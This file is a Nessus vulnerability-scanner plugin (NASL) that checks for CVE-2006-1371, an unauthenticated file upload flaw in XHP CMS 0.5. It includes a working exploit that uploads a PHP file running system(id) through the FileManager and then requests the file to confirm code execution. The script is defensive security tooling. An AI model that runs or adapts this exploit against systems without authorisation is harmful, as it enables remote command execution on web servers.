#
# Script Written By Ferdy Riphagen
#
# Script distributed under the GNU GPLv2 License.
#
# Original advisory by : rgod
# http://retrogod.altervista.org/XHP_CMS_05_xpl.html
#

desc["english"] = "
Synopsis :

The remote webserver is hosting a PHP script which 
is vulnerable to a unrestricted file upload flaw. 

Description :

XHP CMS is installed on the remote system.  
The installed application does not authenticate users to access 
the FileManager scripts located at: 

'/inc/htmlarea/plugins/FileManager/manager.php'

and

'/inc/htmlarea/plugins/FileManager/standalonemanager.php' 

This allows an attacker to upload content to the webserver, and
execute arbitrary commands with privileges of the webserver account. 

See also :

http://www.securityfocus.com/bid/17209
http://xhp.targetit.ro/index.php?page=3&box_id=34&action=show_single_entry&post_id=10

Solution :

Upgrade to version 0.51 or a newer release.  

Risk factor :

High / CVSS Base Score : 7
(AV:R/AC:L/Au:NR/C:P/A:P/I:P/B:N)";
script_description(english:desc["english"]);

if (description) {
 script_id(200100);
 script_version("$Revision: 1.0 $");

 script_cve_id("CVE-2006-1371");
 script_bugtraq_id(17209);
 if (defined_func("script_xref")) {
  script_xref(name:"OSVDB", value:"24058");
  script_xref(name:"OSVDB", value:"24059"); 
 }

 name["english"] = "XHP CMS Version <= 0.5 File Upload Vulnerability";
 script_name(english:name["english"]);
 summary["english"] = "Checks for a arbitrary file upload and execution flaws";
 script_summary(english:summary["english"]);

 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");

 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");

port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);

if (thorough_tests) dirs = make_list("/xhp", "/xhpcms", cgi_dirs()); 
else dirs = make_list("/test/xhp", cgi_dirs());

foreach dir (dirs) {
 res = http_get_cache(item:string(dir, "/inc/htmlarea/plugins/FileManager/standalonemanager.php"), port:port);
 if ("XHP File Manager" >!< res) exit(0);

 if (!safe_checks()) { 
  rand = rand();
  file = string("DELETE_FILE_", rand, ".php"); 
  content = "<?php system(id); ?>"; 

  exp = string(
	"--", rand, "\r\n",
	'Content-Disposition: form-data; name="dir"', "\r\n\r\n",
	"/\r\n",
	"--", rand, "\r\n",
	'Content-Disposition: form-data; name="upload"; filename="', file, '"', "\r\n",
	"Content-Type: text/plain\r\n\r\n",
	content, "\r\n",
	"--", rand, "\r\n",
 	'Content-Disposition: form-data; name="submit"', "\r\n\r\n",
	"Upload\r\n",
	"--", rand, "--\r\n");

  req = string(  
	"POST ", dir, "/inc/htmlarea/plugins/FileManager/images.php HTTP/1.1\r\n",
	"Content-Type: multipart/form-data; boundary=", rand, "\r\n",
	"Host: ", get_host_name(), "\r\n",
	"Content-Length: ", strlen(exp), "\r\n",
	"Connection: close\r\n\r\n",
	 exp); 
  recv = http_keepalive_send_recv(data:req, port:port, bodyonly:TRUE);

  req2 = http_get(item:string(dir, "/filemanager/", file), port:port);
  recv2 = http_keepalive_send_recv(data:req2, port:port, bodyonly:TRUE);
  
  if (recv2 == NULL) exit(0);
  if(egrep(pattern:"uid=[0-9]+.*gid=[0-9]+", string:recv2)) {
   report = string( 
	desc["english"], "\n\n",
	"Note :\n\n",
	"## It was possible to upload and execute a file on the remote webserver.\n",
	"## The file is placed in directory: ", '"', dir, "/filemanager/", '"', "\n",
	"## and is named: ", '"', file, '"', "\n\n",
	"## You should delete this file as soon as possible !!!\n"); 

   security_hole(port:port, data:report);
   exit(0);
  }
 }
 else {
  req = http_get_cache(item:string(dir, "/index.php"), port:port);
  
 if (egrep(pattern:"<a href[^>]+>Powered by XHP CMS v0\.(4\.1|5)", string:req)) {
   security_hole(port:port, data:desc["english"]);
   exit(0);
  }
 }
} 
